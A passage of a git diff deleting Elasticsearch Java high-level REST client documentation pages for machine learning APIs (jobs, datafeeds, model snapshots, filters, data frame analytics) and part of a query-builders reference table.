about the {anomaly-job} -configuration. - -A `Job` requires the following arguments: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-config] --------------------------------------------------- -<1> The job ID -<2> An analysis configuration -<3> A data description -<4> Optionally, a human-readable description - -[id="{upid}-{api}-analysis-config"] -==== Analysis configuration - -The analysis configuration of the {anomaly-job} is defined in the `AnalysisConfig`. 
-`AnalysisConfig` reflects all the configuration -settings that can be defined using the REST API. - -Using the REST API, we could define this analysis configuration: - -[source,js] --------------------------------------------------- -"analysis_config" : { - "bucket_span" : "10m", - "detectors" : [ - { - "detector_description" : "Sum of total", - "function" : "sum", - "field_name" : "total" - } - ] -} --------------------------------------------------- -// NOTCONSOLE - -Using the `AnalysisConfig` object and the high level REST client, the list -of detectors must be built first. - -An example of building a `Detector` instance is as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-detector] --------------------------------------------------- -<1> The function to use -<2> The field to apply the function to -<3> Optionally, a human-readable description - -Then the same configuration would be: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-analysis-config] --------------------------------------------------- -<1> Create a list of detectors -<2> Pass the list of detectors to the analysis config builder constructor -<3> The bucket span - -[id="{upid}-{api}-data-description"] -==== Data description - -After defining the analysis config, the next thing to define is the -data description, using a `DataDescription` instance. `DataDescription` -reflects all the configuration settings that can be defined using the -REST API. - -Using the REST API, we could define this metrics configuration: - -[source,js] --------------------------------------------------- -"data_description" : { - "time_field" : "timestamp" -} --------------------------------------------------- -// NOTCONSOLE - -Using the `DataDescription` object and the high level REST client, the same -configuration would be: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-data-description] --------------------------------------------------- -<1> The time field - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ returns the full representation of -the new {ml} job if it has been successfully created. This will -contain the creation time and other fields initialized using -default values: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> The creation time is a field that was not passed in the `Job` object in the request diff --git a/docs/java-rest/high-level/ml/put-trained-model.asciidoc b/docs/java-rest/high-level/ml/put-trained-model.asciidoc deleted file mode 100644 index d8c32015a50..00000000000 --- a/docs/java-rest/high-level/ml/put-trained-model.asciidoc +++ /dev/null @@ -1,61 +0,0 @@ --- -:api: put-trained-model -:request: PutTrainedModelRequest -:response: PutTrainedModelResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Put trained models API - -experimental:[] - -experimental::[] - -Creates a new trained model for inference. -The API accepts a +{request}+ object as a request and returns a +{response}+. 
-
-[id="{upid}-{api}-request"]
-==== Put trained models request
-
-A +{request}+ requires the following argument:
-
-["source","java",subs="attributes,callouts,macros"]
---------------------------------------------------
-include-tagged::{doc-tests-file}[{api}-request]
---------------------------------------------------
-<1> The configuration of the {infer} trained model to create
-
-[id="{upid}-{api}-config"]
-==== Trained model configuration
-
-The `TrainedModelConfig` object contains all the details about the trained model
-configuration and contains the following arguments:
-
-["source","java",subs="attributes,callouts,macros"]
---------------------------------------------------
-include-tagged::{doc-tests-file}[{api}-config]
---------------------------------------------------
-<1> The {infer} definition for the model
-<2> Optionally, if the {infer} definition is large, you may choose to compress it for transport.
-    Do not supply both the compressed and uncompressed definitions.
-<3> The unique model ID
-<4> The input field names for the model definition
-<5> Optionally, a human-readable description
-<6> Optionally, an object map containing metadata about the model
-<7> Optionally, an array of tags to organize the model
-<8> The default inference config to use with the model. Must match the underlying
-    definition's `target_type`.
-
-include::../execution.asciidoc[]
-
-[id="{upid}-{api}-response"]
-==== Response
-
-The returned +{response}+ contains the newly created trained model.
-The +{response}+ will omit the model definition as a precaution against
-streaming large model definitions back to the client.
-
-["source","java",subs="attributes,callouts,macros"]
---------------------------------------------------
-include-tagged::{doc-tests-file}[{api}-response]
---------------------------------------------------
diff --git a/docs/java-rest/high-level/ml/revert-model-snapshot.asciidoc b/docs/java-rest/high-level/ml/revert-model-snapshot.asciidoc
deleted file mode 100644
index b6785299b52..00000000000
--- a/docs/java-rest/high-level/ml/revert-model-snapshot.asciidoc
+++ /dev/null
@@ -1,48 +0,0 @@
---
-:api: revert-model-snapshot
-:request: RevertModelSnapshotRequest
-:response: RevertModelSnapshotResponse
---
-[role="xpack"]
-
-[id="{upid}-{api}"]
-=== Revert model snapshots API
-
-Reverts to a previous {ml} model snapshot.
-It accepts a +{request}+ object and responds
-with a +{response}+ object.
-
-[id="{upid}-{api}-request"]
-==== Revert model snapshots request
-
-A +{request}+ requires the following arguments:
-
-["source","java",subs="attributes,callouts,macros"]
---------------------------------------------------
-include-tagged::{doc-tests-file}[{api}-request]
---------------------------------------------------
-<1> Constructing a new request referencing existing `jobId` and `snapshotId` values.
-
-==== Optional arguments
-
-The following arguments are optional:
-
-["source","java",subs="attributes,callouts,macros"]
---------------------------------------------------
-include-tagged::{doc-tests-file}[{api}-delete-intervening-results]
---------------------------------------------------
-<1> A flag indicating whether results in the period between the timestamp of the
-reverted snapshot and the latest results should be deleted.
-
-
-include::../execution.asciidoc[]
-
-[id="{upid}-{api}-response"]
-==== Revert job response
-
-A +{response}+ contains the full representation of the reverted `ModelSnapshot`.
- -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> The reverted `ModelSnapshot` diff --git a/docs/java-rest/high-level/ml/set-upgrade-mode.asciidoc b/docs/java-rest/high-level/ml/set-upgrade-mode.asciidoc deleted file mode 100644 index d19a0d66360..00000000000 --- a/docs/java-rest/high-level/ml/set-upgrade-mode.asciidoc +++ /dev/null @@ -1,41 +0,0 @@ --- -:api: set-upgrade-mode -:request: SetUpgradeModeRequest -:response: AcknowledgedResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Set upgrade mode API - -Temporarily halts all {ml} job and {dfeed} tasks when `enabled=true`. Their -reported states remain unchanged. Consequently, when exiting upgrade mode the halted {ml} jobs and -{dfeeds} will return to their previous state. - -It accepts a +{request}+ object and responds with a +{response}+ object. - -When `enabled=true`, no new jobs can be opened, and no job or {dfeed} tasks will -be running. Be sure to set `enabled=false` once upgrade actions are completed. - -[id="{upid}-{api}-request"] -==== Set upgrade mode request - -A +{request}+ object gets created setting the desired `enabled` state. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Constructing a new request referencing enabling upgrade mode -<2> Optionally setting the `timeout` value for how long the -execution should wait. - -[id="{upid}-{api}-response"] -==== Set upgrade mode response - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> `isAcknowledged()` from the +{response}+ indicates if the setting was set successfully. - -include::../execution.asciidoc[] \ No newline at end of file diff --git a/docs/java-rest/high-level/ml/start-data-frame-analytics.asciidoc b/docs/java-rest/high-level/ml/start-data-frame-analytics.asciidoc deleted file mode 100644 index 6bfc9fff089..00000000000 --- a/docs/java-rest/high-level/ml/start-data-frame-analytics.asciidoc +++ /dev/null @@ -1,40 +0,0 @@ --- -:api: start-data-frame-analytics -:request: StartDataFrameAnalyticsRequest -:response: AcknowledgedResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Start {dfanalytics-jobs} API - -experimental::[] - -Starts an existing {dfanalytics-job}. -It accepts a +{request}+ object and responds with a +{response}+ object. - -[id="{upid}-{api}-request"] -==== Start {dfanalytics-jobs} request - -A +{request}+ object requires a {dfanalytics-job} ID. - -["source","java",subs="attributes,callouts,macros"] ---------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] ---------------------------------------------------- -<1> Constructing a new start request referencing an existing {dfanalytics-job} - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Start {dfanalytics-jobs} response - -The returned +{response}+ object acknowledges the {dfanalytics-job} has started. 
- -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> `getNode()` returns the node that the job was assigned to. If the -job is allowed to open lazily and has not yet been assigned to a node -then an empty string is returned. If `getNode()` returns `null` then -the server is an old version that does not return node information. diff --git a/docs/java-rest/high-level/ml/start-datafeed.asciidoc b/docs/java-rest/high-level/ml/start-datafeed.asciidoc deleted file mode 100644 index a54695bf821..00000000000 --- a/docs/java-rest/high-level/ml/start-datafeed.asciidoc +++ /dev/null @@ -1,58 +0,0 @@ --- -:api: start-datafeed -:request: StartDatafeedRequest -:response: StartDatafeedResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Start {dfeeds} API - -Starts a {ml} {dfeed} in the cluster. It accepts a +{request}+ object and -responds with a +{response}+ object. - -[id="{upid}-{api}-request"] -==== Start {dfeeds} request - -A +{request}+ object is created referencing a non-null `datafeedId`. -All other fields are optional for the request. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Constructing a new request referencing an existing `datafeedId`. - -==== Optional arguments - -The following arguments are optional. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-options] --------------------------------------------------- -<1> Set when the {dfeed} should end, the value is exclusive. -May be an epoch seconds, epoch millis or an ISO 8601 string. -"now" is a special value that indicates the current time. -If you do not specify an end time, the {dfeed} runs continuously. -<2> Set when the {dfeed} should start, the value is inclusive. -May be an epoch seconds, epoch millis or an ISO 8601 string. -If you do not specify a start time and the {dfeed} is associated with a new job, -the analysis starts from the earliest time for which data is available. -<3> Set the timeout for the request - -[id="{upid}-{api}-response"] -==== Start {dfeeds} response - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> `isStarted()` from the +{response}+ is always `true` if the {dfeed} was -started successfully. (An exception would be thrown instead if the {dfeed} -was not started successfully.) -<2> `getNode()` returns the node that the {dfeed} was assigned to. If the -{dfeed} is allowed to open lazily and has not yet been assigned to a node -then an empty string is returned. If `getNode()` returns `null` then -the server is an old version that does not return node information. 
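-
-Putting the request and response together, here is a rough, untested sketch of
-the flow described above. As in the earlier sketch, `client` is an existing
-`RestHighLevelClient`, the IDs and times are made up, and the setter names are
-assumptions taken from the callouts, so check them against the client Javadoc.
-
-[source,java]
---------------------------------------------------
-StartDatafeedRequest request = new StartDatafeedRequest("datafeed-total-requests"); // existing datafeed ID
-request.setStart("2021-01-01T00:00:00Z");           // optional, inclusive start time
-request.setEnd("now");                              // optional, exclusive end time
-request.setTimeout(TimeValue.timeValueSeconds(30)); // optional, how long to wait for the request
-
-StartDatafeedResponse response =
-    client.machineLearning().startDatafeed(request, RequestOptions.DEFAULT);
-boolean started = response.isStarted(); // always true on success, as noted above
-String node = response.getNode();       // may be empty or null, as noted above
---------------------------------------------------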
- -include::../execution.asciidoc[] diff --git a/docs/java-rest/high-level/ml/stop-data-frame-analytics.asciidoc b/docs/java-rest/high-level/ml/stop-data-frame-analytics.asciidoc deleted file mode 100644 index 58c66b472fc..00000000000 --- a/docs/java-rest/high-level/ml/stop-data-frame-analytics.asciidoc +++ /dev/null @@ -1,32 +0,0 @@ --- -:api: stop-data-frame-analytics -:request: StopDataFrameAnalyticsRequest -:response: StopDataFrameAnalyticsResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Stop {dfanalytics-jobs} API - -experimental::[] - -Stops a running {dfanalytics-job}. -It accepts a +{request}+ object and responds with a +{response}+ object. - -[id="{upid}-{api}-request"] -==== Stop {dfanalytics-jobs} request - -A +{request}+ object requires a {dfanalytics-job} ID. - -["source","java",subs="attributes,callouts,macros"] ---------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] ---------------------------------------------------- -<1> Constructing a new stop request referencing an existing {dfanalytics-job} -<2> Optionally used to stop a failed task - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ object acknowledges the {dfanalytics-job} has stopped. \ No newline at end of file diff --git a/docs/java-rest/high-level/ml/stop-datafeed.asciidoc b/docs/java-rest/high-level/ml/stop-datafeed.asciidoc deleted file mode 100644 index 8b94bea8713..00000000000 --- a/docs/java-rest/high-level/ml/stop-datafeed.asciidoc +++ /dev/null @@ -1,39 +0,0 @@ --- -:api: stop-datafeed -:request: StopDatafeedRequest -:response: StopDatafeedResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Stop datafeeds API - -Stops a {ml} datafeed in the cluster. -It accepts a +{request}+ object and responds -with a +{response}+ object. - -[id="{upid}-{api}-request"] -==== Stop datafeeds request - -A +{request}+ object is created referencing any number of non-null `datafeedId` entries. -Wildcards and `_all` are also accepted. -All other fields are optional for the request. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Constructing a new request referencing existing `datafeedId` entries. - -==== Optional arguments - -The following arguments are optional. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-options] --------------------------------------------------- -<1> Whether to ignore if a wildcard expression matches no datafeeds. (This includes `_all` string) -<2> If true, the datafeed is stopped forcefully. -<3> Controls the amount of time to wait until a datafeed stops. The default value is 20 seconds. - -include::../execution.asciidoc[] \ No newline at end of file diff --git a/docs/java-rest/high-level/ml/update-data-frame-analytics.asciidoc b/docs/java-rest/high-level/ml/update-data-frame-analytics.asciidoc deleted file mode 100644 index 36db38186dc..00000000000 --- a/docs/java-rest/high-level/ml/update-data-frame-analytics.asciidoc +++ /dev/null @@ -1,54 +0,0 @@ --- -:api: update-data-frame-analytics -:request: UpdateDataFrameAnalyticsRequest -:response: UpdateDataFrameAnalyticsResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Update {dfanalytics-jobs} API - -experimental::[] - -Updates an existing {dfanalytics-job}. 
-The API accepts an +{request}+ object as a request and returns an +{response}+. - -[id="{upid}-{api}-request"] -==== Update {dfanalytics-jobs} request - -An +{request}+ requires the following argument: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> The configuration of the {dfanalytics-job} update to perform - -[id="{upid}-{api}-config"] -==== {dfanalytics-cap} configuration update - -The `DataFrameAnalyticsConfigUpdate` object contains all the details about the {dfanalytics-job} -configuration update and contains the following arguments: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-config-update] --------------------------------------------------- -<1> The {dfanalytics-job} ID -<2> The human-readable description -<3> The memory limit for the model created as part of the analysis process -<4> The maximum number of threads to be used by the analysis - -[id="{upid}-{api}-query-config"] - - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ contains the updated {dfanalytics-job}. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- diff --git a/docs/java-rest/high-level/ml/update-datafeed.asciidoc b/docs/java-rest/high-level/ml/update-datafeed.asciidoc deleted file mode 100644 index b76c009f9cb..00000000000 --- a/docs/java-rest/high-level/ml/update-datafeed.asciidoc +++ /dev/null @@ -1,59 +0,0 @@ --- -:api: update-datafeed -:request: UpdateDatafeedRequest -:response: PutDatafeedResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Update datafeeds API - -Updates a {ml} datafeed in the cluster. The API accepts a +{request}+ object -as a request and returns a +{response}+. - -[id="{upid}-{api}-request"] -==== Update datafeeds request - -A +{request}+ requires the following argument: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> The updated configuration of the {ml} datafeed - -[id="{upid}-{api}-config"] -==== Updated datafeeds arguments - -A `DatafeedUpdate` requires an existing non-null `datafeedId` and -allows updating various settings. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-config] --------------------------------------------------- -<1> Mandatory, non-null `datafeedId` referencing an existing {ml} datafeed. -<2> Optional, set the datafeed aggregations for data gathering. -<3> Optional, the indices that contain the data to retrieve and feed into the -{anomaly-job}. -<4> Optional, specifies how data searches are split into time chunks. -<5> Optional, the interval at which scheduled queries are made while the -datafeed runs in real time. -<6> Optional, a query to filter the search results by. Defaults to the -`match_all` query. -<7> Optional, the time interval behind real time that data is queried. -<8> Optional, allows the use of script fields. -<9> Optional, the `size` parameter used in the searches. 
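-
-As a rough sketch of the update flow (not one of the tested snippets above), a
-`DatafeedUpdate` might be assembled and sent as shown below. The builder entry
-point, setter names, and all values here are assumptions based on the callouts,
-so verify them against the client Javadoc; `client` is an existing
-`RestHighLevelClient`.
-
-[source,java]
---------------------------------------------------
-DatafeedUpdate update = new DatafeedUpdate.Builder("datafeed-total-requests") // existing datafeed ID
-    .setIndices("server-metrics", "server-metrics-2")             // new source indices
-    .setQuery(QueryBuilders.termQuery("datacenter", "us-east-1")) // narrower query
-    .setQueryDelay(TimeValue.timeValueMinutes(2))                 // new query delay
-    .setScrollSize(500)                                           // new scroll size
-    .build();
-
-UpdateDatafeedRequest request = new UpdateDatafeedRequest(update);
-PutDatafeedResponse response =
-    client.machineLearning().updateDatafeed(request, RequestOptions.DEFAULT);
---------------------------------------------------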
- -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ returns the full representation of -the updated {ml} datafeed if it has been successfully updated. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> The updated datafeed. diff --git a/docs/java-rest/high-level/ml/update-filter.asciidoc b/docs/java-rest/high-level/ml/update-filter.asciidoc deleted file mode 100644 index d73560500f1..00000000000 --- a/docs/java-rest/high-level/ml/update-filter.asciidoc +++ /dev/null @@ -1,57 +0,0 @@ --- -:api: update-filter -:request: UpdateFilterRequest -:response: PutFilterResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Update filters API - -Updates an existing {ml} filter in the cluster. The API accepts a +{request}+ -object as a request and returns a +{response}+. - -[id="{upid}-{api}-request"] -==== Update filters request - -A +{request}+ requires the following argument: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> The id of the existing {ml} filter. - -==== Optional arguments -The following arguments are optional: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-description] --------------------------------------------------- -<1> The updated description of the {ml} filter. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-add-items] --------------------------------------------------- -<1> The list of items to add to the {ml} filter. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-remove-items] --------------------------------------------------- -<1> The list of items to remove from the {ml} filter. - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ returns the full representation of -the updated {ml} filter if it has been successfully updated. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> The updated `MlFilter`. diff --git a/docs/java-rest/high-level/ml/update-job.asciidoc b/docs/java-rest/high-level/ml/update-job.asciidoc deleted file mode 100644 index 5a2217d0924..00000000000 --- a/docs/java-rest/high-level/ml/update-job.asciidoc +++ /dev/null @@ -1,67 +0,0 @@ --- -:api: update-job -:request: UpdateJobRequest -:response: PutJobResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Update {anomaly-jobs} API - -Provides the ability to update an {anomaly-job}. -It accepts a +{request}+ object and responds with a +{response}+ object. - -[id="{upid}-{api}-request"] -==== Update {anomaly-jobs} request - -An +{request}+ object gets created with a `JobUpdate` object. 
-
-["source","java",subs="attributes,callouts,macros"]
---------------------------------------------------
-include-tagged::{doc-tests-file}[{api}-request]
---------------------------------------------------
-<1> Constructing a new request referencing a `JobUpdate` object.
-
-==== Optional arguments
-
-The `JobUpdate` object has many optional arguments with which to update an
-existing {anomaly-job}. An existing, non-null `jobId` must be referenced when it
-is created.
-
-["source","java",subs="attributes,callouts,macros"]
---------------------------------------------------
-include-tagged::{doc-tests-file}[{api}-options]
---------------------------------------------------
-<1> Mandatory, non-null `jobId` referencing an existing {anomaly-job}.
-<2> Updated description.
-<3> Updated analysis limits.
-<4> Updated background persistence interval.
-<5> Updated analysis config's categorization filters.
-<6> Updated detectors through the `JobUpdate.DetectorUpdate` object.
-<7> Updated group membership.
-<8> Updated result retention.
-<9> Updated model plot configuration.
-<10> Updated model snapshot retention setting.
-<11> Updated custom settings.
-<12> Updated renormalization window.
-
-Included with these options are detector-specific updates made through the
-optional `JobUpdate.DetectorUpdate` object.
-
-["source","java",subs="attributes,callouts,macros"]
---------------------------------------------------
-include-tagged::{doc-tests-file}[{api}-detector-options]
---------------------------------------------------
-<1> The index of the detector. `0` means unknown.
-<2> The optional description of the detector.
-<3> The `DetectionRule` rules that apply to this detector.
-
-include::../execution.asciidoc[]
-
-[id="{upid}-{api}-response"]
-==== Update {anomaly-jobs} response
-
-A +{response}+ contains the updated `Job` object.
-
-["source","java",subs="attributes,callouts,macros"]
---------------------------------------------------
-include-tagged::{doc-tests-file}[{api}-response]
---------------------------------------------------
-<1> `getResponse()` returns the updated `Job` object.
diff --git a/docs/java-rest/high-level/ml/update-model-snapshot.asciidoc b/docs/java-rest/high-level/ml/update-model-snapshot.asciidoc
deleted file mode 100644
index a38462e1503..00000000000
--- a/docs/java-rest/high-level/ml/update-model-snapshot.asciidoc
+++ /dev/null
@@ -1,54 +0,0 @@
---
-:api: update-model-snapshot
-:request: UpdateModelSnapshotRequest
-:response: UpdateModelSnapshotResponse
---
-[role="xpack"]
-[id="{upid}-{api}"]
-=== Update model snapshots API
-
-Updates a {ml} model snapshot.
-It accepts a +{request}+ object and responds with a +{response}+ object.
-
-[id="{upid}-{api}-request"]
-==== Update model snapshots request
-
-A +{request}+ requires the following arguments:
-
-["source","java",subs="attributes,callouts,macros"]
---------------------------------------------------
-include-tagged::{doc-tests-file}[{api}-request]
---------------------------------------------------
-<1> Constructing a new request referencing existing `jobId` and `snapshotId`
-values.
-
-==== Optional arguments
-
-The following arguments are optional:
-
-["source","java",subs="attributes,callouts,macros"]
---------------------------------------------------
-include-tagged::{doc-tests-file}[{api}-description]
---------------------------------------------------
-<1> The updated description of the {ml} model snapshot.
- -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-retain] --------------------------------------------------- -<1> The updated `retain` property of the {ml} model snapshot. - - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Update model snapshots response - -A +{response}+ contains an acknowledgement of the update request and the full representation of the updated `ModelSnapshot` object - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> An acknowledgement of the request. -<2> The updated `ModelSnapshot`. diff --git a/docs/java-rest/high-level/query-builders.asciidoc b/docs/java-rest/high-level/query-builders.asciidoc deleted file mode 100644 index a2706e7ad8a..00000000000 --- a/docs/java-rest/high-level/query-builders.asciidoc +++ /dev/null @@ -1,104 +0,0 @@ -[[java-rest-high-query-builders]] -=== Building Queries - -This page lists all the available search queries with their corresponding `QueryBuilder` class name and helper method name in the -`QueryBuilders` utility class. - -:query-ref: {elasticsearch-javadoc}/org/elasticsearch/index/query -:mapper-extras-ref: {mapper-extras-client-javadoc}/org/elasticsearch/index/query -:parentjoin-ref: {parent-join-client-javadoc}/org/elasticsearch/join/query -:percolate-ref: {percolator-client-javadoc}/org/elasticsearch/percolator - -==== Match All Query -[options="header"] -|====== -| Search Query | QueryBuilder Class | Method in QueryBuilders -| {ref}/query-dsl-match-all-query.html[Match All] | {query-ref}/MatchAllQueryBuilder.html[MatchAllQueryBuilder] | {query-ref}/QueryBuilders.html#matchAllQuery--[QueryBuilders.matchAllQuery()] -|====== - -==== Full Text Queries -[options="header"] -|====== -| Search Query | QueryBuilder Class | Method in QueryBuilders -| {ref}/query-dsl-match-query.html[Match] | {query-ref}/MatchQueryBuilder.html[MatchQueryBuilder] | {query-ref}/QueryBuilders.html#matchQuery-java.lang.String-java.lang.Object-[QueryBuilders.matchQuery()] -| {ref}/query-dsl-match-query-phrase.html[Match Phrase] | {query-ref}/MatchPhraseQueryBuilder.html[MatchPhraseQueryBuilder] | {query-ref}/QueryBuilders.html#matchPhraseQuery-java.lang.String-java.lang.Object-[QueryBuilders.matchPhraseQuery()] -| {ref}/query-dsl-match-query-phrase-prefix.html[Match Phrase Prefix] | {query-ref}/MatchPhrasePrefixQueryBuilder.html[MatchPhrasePrefixQueryBuilder] | {query-ref}/QueryBuilders.html#matchPhrasePrefixQuery-java.lang.String-java.lang.Object-[QueryBuilders.matchPhrasePrefixQuery()] -| {ref}/query-dsl-multi-match-query.html[Multi Match] | {query-ref}/MultiMatchQueryBuilder.html[MultiMatchQueryBuilder] | {query-ref}/QueryBuilders.html#multiMatchQuery-java.lang.Object-java.lang.String\…-[QueryBuilders.multiMatchQuery()] -| {ref}/query-dsl-common-terms-query.html[Common Terms] | {query-ref}/CommonTermsQueryBuilder.html[CommonTermsQueryBuilder] | {query-ref}/QueryBuilders.html#commonTermsQuery-java.lang.String-java.lang.Object-[QueryBuilders.commonTermsQuery()] -| {ref}/query-dsl-query-string-query.html[Query String] | {query-ref}/QueryStringQueryBuilder.html[QueryStringQueryBuilder] | {query-ref}/QueryBuilders.html#queryStringQuery-java.lang.String-[QueryBuilders.queryStringQuery()] -| {ref}/query-dsl-simple-query-string-query.html[Simple Query String] | 
{query-ref}/SimpleQueryStringBuilder.html[SimpleQueryStringBuilder] | {query-ref}/QueryBuilders.html#simpleQueryStringQuery-java.lang.String-[QueryBuilders.simpleQueryStringQuery()] -|====== - -==== Term-level queries -[options="header"] -|====== -| Search Query | QueryBuilder Class | Method in QueryBuilders -| {ref}/query-dsl-term-query.html[Term] | {query-ref}/TermQueryBuilder.html[TermQueryBuilder] | {query-ref}/QueryBuilders.html#termQuery-java.lang.String-java.lang.String-[QueryBuilders.termQuery()] -| {ref}/query-dsl-terms-query.html[Terms] | {query-ref}/TermsQueryBuilder.html[TermsQueryBuilder] | {query-ref}/QueryBuilders.html#termsQuery-java.lang.String-java.util.Collection-[QueryBuilders.termsQuery()] -| {ref}/query-dsl-range-query.html[Range] | {query-ref}/RangeQueryBuilder.html[RangeQueryBuilder] | {query-ref}/QueryBuilders.html#rangeQuery-java.lang.String-[QueryBuilders.rangeQuery()] -| {ref}/query-dsl-exists-query.html[Exists] | {query-ref}/ExistsQueryBuilder.html[ExistsQueryBuilder] | {query-ref}/QueryBuilders.html#existsQuery-java.lang.String-[QueryBuilders.existsQuery()] -| {ref}/query-dsl-prefix-query.html[Prefix] | {query-ref}/PrefixQueryBuilder.html[PrefixQueryBuilder] | {query-ref}/QueryBuilders.html#prefixQuery-java.lang.String-java.lang.String-[QueryBuilders.prefixQuery()] -| {ref}/query-dsl-wildcard-query.html[Wildcard] | {query-ref}/WildcardQueryBuilder.html[WildcardQueryBuilder] | {query-ref}/QueryBuilders.html#wildcardQuery-java.lang.String-java.lang.String-[QueryBuilders.wildcardQuery()] -| {ref}/query-dsl-regexp-query.html[Regexp] | {query-ref}/RegexpQueryBuilder.html[RegexpQueryBuilder] | {query-ref}/QueryBuilders.html#regexpQuery-java.lang.String-java.lang.String-[QueryBuilders.regexpQuery()] -| {ref}/query-dsl-fuzzy-query.html[Fuzzy] | {query-ref}/FuzzyQueryBuilder.html[FuzzyQueryBuilder] | {query-ref}/QueryBuilders.html#fuzzyQuery-java.lang.String-java.lang.String-[QueryBuilders.fuzzyQuery()] -| {ref}/query-dsl-type-query.html[Type] | {query-ref}/TypeQueryBuilder.html[TypeQueryBuilder] | {query-ref}/QueryBuilders.html#typeQuery-java.lang.String-[QueryBuilders.typeQuery()] -| {ref}/query-dsl-ids-query.html[Ids] | {query-ref}/IdsQueryBuilder.html[IdsQueryBuilder] | {query-ref}/QueryBuilders.html#idsQuery--[QueryBuilders.idsQuery()] -|====== - -==== Compound queries -[options="header"] -|====== -| Search Query | QueryBuilder Class | Method in QueryBuilders -| {ref}/query-dsl-constant-score-query.html[Constant Score] | {query-ref}/ConstantScoreQueryBuilder.html[ConstantScoreQueryBuilder] | {query-ref}/QueryBuilders.html#constantScoreQuery-org.elasticsearch.index.query.QueryBuilder-[QueryBuilders.constantScoreQuery()] -| {ref}/query-dsl-bool-query.html[Bool] | {query-ref}/BoolQueryBuilder.html[BoolQueryBuilder] | {query-ref}/QueryBuilders.html#boolQuery--[QueryBuilders.boolQuery()] -| {ref}/query-dsl-dis-max-query.html[Dis Max] | {query-ref}/DisMaxQueryBuilder.html[DisMaxQueryBuilder] | {query-ref}/QueryBuilders.html#disMaxQuery--[QueryBuilders.disMaxQuery()] -| {ref}/query-dsl-function-score-query.html[Function Score] | {query-ref}/functionscore/FunctionScoreQueryBuilder.html[FunctionScoreQueryBuilder] | {query-ref}/QueryBuilders.html#functionScoreQuery-org.elasticsearch.index.query.functionscore.FunctionScoreQueryBuilder.FilterFunctionBuilder:A-[QueryBuilders.functionScoreQuery()] -| {ref}/query-dsl-boosting-query.html[Boosting] | {query-ref}/BoostingQueryBuilder.html[BoostingQueryBuilder] | 
